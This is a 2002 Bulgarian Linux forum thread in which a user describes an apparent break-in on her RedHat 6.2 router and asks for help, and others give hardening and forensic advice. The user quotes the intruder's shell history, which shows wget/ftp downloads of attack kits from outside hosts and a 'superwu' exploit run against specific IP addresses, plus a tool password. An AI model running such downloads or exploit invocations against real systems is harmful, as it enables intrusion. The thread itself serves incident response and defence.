|
|
ВНИМАНИЕ: Използвайте форумите на сайта за дa зададете вашите въпроси.
Въпрос |
От: eureka (eureka __@__ mail< dot >bg) |
Дата: 11/19/2002 |
Zdravejte,
Imam nujda ot pomosht i tyrsia otgovori na iakolko vyprosa
na s koito ne moga da se spravia sama.
Predi okolo mesec si pusnah kabelen internet, i tyj kato
tova mi beshe neshto kato "detska mechta" - vednaga podkarah
na ednin star Pentium na 188 Mhz RedHat 6.2.
Spriah pochti vsichko s izkliuchenie na
DNS,http,Authentication service na port 113 /NE ZNAM KAK DA
GO SPRA/, i kachih SSH2-non comersial version.
Configurirah go da rutira vsichko praz nego i s ipchains
maskirah localnite adresi.
Kompiutyra raboti taka v prodyljenie na mesec kato az
chat-pat vlizah za da pocykam (opitvah da si podkaram
multi-ruter-trafo-grafer(ne sym)) ... i taka.
Predi dva dena se lognah i ostanovih che imam mail !!!
tochnia text ne moga da kaja ..
//za syjalenie dokato chovyrkah sym zatrila mbox-a//
..no beshe neshto svyrzano s err pri logratate
zapochnah da se chudia i da "rychkam" za da ustanovia
prichinata.. i se natyknah na stranni "pisania" v
history-to:
789 exit
*********
790 cd /dev/hpd
791 cd /dev/hpd
792 cd /dev
793 mkdir hpd
794 cd hpd
795 ls
796 ftp lordice.ro
797 ls
798 tar -zvf 1.tar.gz
799 tar -xvf 1.tar.gz
800 tar -xf 1.tar.gz
801 tar -zxvf 1.tar.gz
802 ls
803 tar -zf 1.tar.gz
804 tar --help
805 tar -tvf 1.tar.gz
806 rm -rf 1.tar.gz
807 wget folositoare.go.ro/1.tar.gz
808 ftp 65.126.126.199
809 ftp 193.231.236.41
810 ftp 193.231.236.41
811 wget imperr.home.ro/darkbot-6f6-r6_tar.tar
812 ftp blabla.com
813 ftp alyla.net
814 ls
815 tar -xzvf darkbot-6f6-r6_tar.tar
816 cd darkbot6f6/
817 ls
818 cd dat
819 ls
820 cd ..
821 cd docs
822 ls
823 pico README
824 cd ..
825 cd../
826 pico
827 cd ..
828 ls
829 rm -rf bitchbot-1_0_2_tar.tar darkbot6f6
830 rm -rf darkbot-6f6-r6_tar.tar
831 tar -xzvf superwu.tar.gz
832 cd super-wu
833 ./superwu 64.18.125.90 21
834 ./superwu 64.244.71.19 21
*******
835 cd /mnt/cdrom
...
kakto mojesh da si predstavish uchudvaneto mi beshe super
goliamo...
s enda 'last' command ustanovih che ima zapisi ot roda
**
ftp ftpd12124 pD9514DE2.dip.t- Tue Nov 5 14:50 -
14:53 (00:03)
ftp ftpd1645 telehouse-103-1- Fri Nov 8 09:39 -
09:40 (00:00)
ftp ftpd1276 206.48.88.103 Wed Nov 6 14:10 -
down (03:12)
ftp ftpd872 160.40.15.54 Wed Nov 6 02:07 -
down (15:16)
**
:)) .. ADOVA RABOTA ..
dokopah se do 'superwu' i pri startiranetpo mi iska
password
v edna ot poddirectoriite otkrih 'README' v koeto pishe
samo!!:
password:wegotelectricstyle
seshtash se che ia napisah ... i mi se poiavi
"Ask Electricy members for this"
ps -A ne mi raboi / lipsvat hiliadi logove / i kakvo li
oshte ne
ot togava gi tyrsia i ne znam kakvo da pravia.
Obshto vzeto tova e. Razchitam na niakakvo mnenie i support
Pozdravi Eureka
|
Отговор #1 |
От: van |
Дата: 11/19/2002 |
Sled podobni izjiviavania 100% sigurnost nyama. Az pone ne
bih bil siguren, che ne sum propusnal neshto.
Moya suvet e sled kato i bez drugo mashinata ne pravi nishto
osven da marshrutizira/maskira trafik da formatirash diska i
da preinstalirash. Spri DNS-a ( ne vijdam zashto da raboti
ako ne go polzvash po prednaznachenie). Spri httpd-to ako ne
se izpolzva, izpolzvai tcp wraper i ogranichi ssh vruzkite.
Sushtia efekt mojesh da postignesh i s iptables/ipchains
Za da spresh Authentication service e dostatuchno da spresh
identd.
Ima edno obshto pravilo, koeto vurshi rabota pri
ustanoviavane na minimalno neobhodimite services -
zabraniava se vsichko i sled tova spored nujdite zapochvash
da puskash _SAMO_ tova, bez koeto ne moje :)
V obshtia sluchai tova e dostatuchno, a i dava vuzmojnost da
se oburne pobveche vnimanie na sravnitelno malko
konfiguracii i da se izbegnat chast ot eventualnite problemi
sus sigurnostta, duljashti se na nepravilno konfigurirani
(ili izobshto nekonfigurirani) podsystemi.
Ako chetete tova znachi ne se otegchavate lesno :)
|
Отговор #2 |
От: tedo |
Дата: 11/19/2002 |
prav e choveka ot prednia post - zabraniavash vsichko i
puskash samo tova keoto naistina ne ti triabva - suveta si
struva cenata v zlato :)
mnogo interesen posting vupreki che iavno e imalo hack -
liubopitno mi e dali hacka e sprial s router mashinata ili e
pluznal i po vutreshnata mreja
a dokolkoto niama ps i drugi podobni - ami sigurno sa gi
podmenili s tehni si binaries no v tozi sluchai ps bi
triabvalo da ima ps samo deto niama da pokazva istinskata
kartinka :)
moje da sa polzvali i niakoi rootkit za rabotata - t.e.
avtomatizirani skriptcheta deto triai/promeniat log filove i
podmeniat binary programki kato ps i red oshte drugi neshta
...
vij na tozi adres za razni programki koito bi triabvalo da
napraviat "autopsia" na hacknatata mashinka i da kajat kakvo
e stanalo :
http://atstake.com/research/tools/index.html#forensic
p.s. mnogo interesen post - pishi ako ima oshte novi momenti
:)
|
Отговор #3 |
От: eureka (eureka__at__mail__dot__bg) |
Дата: 11/19/2002 |
10x mnogo za byrzite otgovori.
Otnosno syveta za preinstalaciata ... tova e iasno, no mi
se shte da razbera kakvo tochno mi se e sluchilo, a ne da
preinstaliram prez mesec naprimer.
Misleh si za promianata na logovete ... zashto sa ostavili
history-to ?!?!?
A otnosno razvitieto ..
Preglejdah cron tablicite i otkrih che na vsiaka 15 min ot
chasa se startira sendmail na port 465 - ssmpt
sled kato go "ulovih" - //hvanah go vliuchen // i iztrelia
23b se izkliuchi i taka do sledvashtite 15 min..
Osven tova pregeldah logovete na drug kopiutyr v mrejata
kojto e s RedHat 8 i sedi neprekysnato vkliuchen ... ima
okolo hiliada greshki koito se pyrvi pyt vijdam:
Uninhibited service - Access deny
Tova e utre mislia da preinstaliram i da go napravia PC-to
samo da rutira //vse edno go niama// :((
Iavo triabva da ponablegna na firewall-inga
10x mnogo za url-to
Eureka
|
Отговор #4 |
От: eureka (eureka< at >mail[ точка ]bg) |
Дата: 11/19/2002 |
Npravo nastryhvam !!!
Tochno dokato pisah predishnia post na port 32553 - otkrih
SSH-1.5-1.2.27
|
Отговор #5 |
От: niki |
Дата: 11/19/2002 |
dokato instalirash linux-a procheti knigata Securing and
Optimizing Linux - Redhat Edition (primerite sa za
redhat6.2)
sled kato konfigurirash s-mata po knigata (i kato mislish
razbira se) nqma da imash problemi.
saita e http://www.linuxdoc.org
|
Отговор #6 |
От: tedo |
Дата: 11/19/2002 |
iavno ili sa nachinaeshti ili ne sa se setili ili gi murzi i
ne predpolagat che usera deto e hackant e tolko napred s
materiala che da si proveriava log filove i tn .. :)
neznam ... no kakto kazvash ti e nai dobre edin zdrav analiz
da mu hvurlish na celia proces a to preinstalaciata
nai-lesno :)
moje da sa polzvali niakoi exploit na servicite ....
moje da se porazrovish na
http://www.securityfocus.com/
search -> bugtraq - da vidish ima li i kakvi exploits za
redhat 6.2
ako ne sa mnogo kritichni mashinkite i mojesh da gi
poostavish niakoi i drug den i samo da nabluidavash kakvo
praviat shte e super ;)
opitai ettercap :)
http://ettercap.sourceforge.net/index.php?s=home
|
Отговор #7 |
От: !!! |
Дата: 11/19/2002 |
I Nikoga ama NIKOGA ne zabraviai da proveriavash i da si
slagash security pachovete koito izlizat za saotvetnoto
distro! Ot puskaneto na RH6.2 nasam sigurno sa izlezli
stotici fix-ove.
|
Отговор #8 |
От: bloo |
Дата: 11/20/2002 |
Mnogo mi e chudno, koi e toq "haker" koito shte napishe:
....
804 tar --help
....
Za mene tova e nqkakyv neuk tip, koito e zarbral po nqkakyv
nachin nqkoq druga parola i si e pravil opiti bez da se
pritesnqva mngo mnogo, che moje da go hvanat, taka che,
predi da zakliuchish, che nqkoi e "probil" po nqkakyv nachin
ot vynka, se ogledai okolo tebe
|
Отговор #9 |
От: Народен любимец |
Дата: 11/20/2002 |
Както казаха колегите: някой се е подиграл с теб.
За следващия път ще знаеш какво не трябва да се прави.
Ident се спира с '#' в /etc/inetd.conf + kill -HUP inetd
На www.porcupine.org Виетцето Венема е сложил свои
разработки. Виж
ftp://ftp.porcupine.org/pub/security/index.html
Живей здравословно, следвай Bugtraq+updates, спортувай с
гаджето си и всичко ще е наред.
|
Отговор #10 |
От: Никола Антонов (linux __@__ logos__dot__goto__dot__bg) |
Дата: 11/20/2002 |
По-скоро прилича на безнаказано шетане из системата. Побързай да си
смениш паролата за root с някоя по-трудна (да има букви, цифри, малки и
големи букви, и специални знаци от сорта на &, $ и т.н.), коментирай всички
редове в /etc/inetd.conf и се позамисли кой има информация за акаунтите
на компютъра. Действително, "хакер", който от 6-ия път не може да
разархивира един обикновен tar-архив, по-скоро и сам не знае какво
прави. Да не говорим за "слонските стъпки" в history-то.
Относно подмяната на ps и т.н., виж дали няма някакви промени в
проментилавата PATH на твоя профил. Може просто да стартираш някой
троянски кон от някоя друга директория, а не от подразбиращата се
/usr/bin. Все пак, имай предвид, че ако това се е случило, нищо чудно да ти
знаят root-паролата, освен ако и самият "хакер" не си давас метка какво
прави, а просто изпълнява сляпо някакви "хакерски трикове".
Не ми се вярва да има някакви поражения в системата. Но това не ти пречи
да си пуснеш TCP wrappers (tcpd). Ако все пак се решиш на преинсталация,
след като направиш чистата инсталация, си пусни Tripwire. След това ще ти
е лесно да проследиш какви промени са направени върху системата без
твое знание.
И наистина, защо не се откажеш от тази "антична" версия на RH?
|
Отговор #11 |
От: Lamerix |
Дата: 11/20/2002 |
Znachi kakto kaza nqkoi po-gore dobre shte e da sledish
securityfocus -> bugtraq za exploits i dr takiva nestica,
oshte poveche che tam si pishe i koi sistemi sa uiazvimi i
eventualno reshenie na problema.
Po sushtestvo: tova koeto e svalil vzlomadjiqta se naricha
"autoroot"-er. Tova sa novo pokolenie rootkits, napraveni ot
crackerite za da si ulesnqt 'zanimaniqta'. Mejdu druguto
tochno na foruma na securityfocus imashe interesni postingi
otnosno tezi autoroot-eri.
Tova koeto se vijda ot historito e che tozi nqkoi e vlqzul v
tvoito pc i sled tova e svalil ot ftp server samiq rootkit
(ftp-to kakto vsichki vijdat se hostva qvno ot nashite
susedi ".ro" a i da si priznaq i az ot rumunski serveri sum
teglil takiva autoroot-eri da vidq i az shto za chudo
predstavlqvat).
Otnosno mnenieto na Nikola Antonov, moite uvajeniq kum vas,
no probvaite da svalite edin takuv .tar i ako go
razarhivirate ot purviq put imate cherpa ot men - izrazqvam
lichno mnenie. Prosto samite arhivi se razarhivirat po
tochno opredelena podredba na opciite na 'tar', zatova i
suotvetniq 'hacker' sled kato e probval nqkolko puti da go
untar-ne se e vidql qvno v chudo za da napishe 'tar -help'
:)))
Bye i sus zdrave
|
Отговор #12 |
От: Losh |
Дата: 11/21/2002 |
ei sa i az idvam.mnogo mi e interesno no nishto ne
razbiram...
Izchakaite malko da ponaucha neshto i moga i az da pomogna
:))))
|
<< LPRNG+apsfilter (0
) | mandrake 9.0 + lan + internet (2
) >>
|
|
|
|
|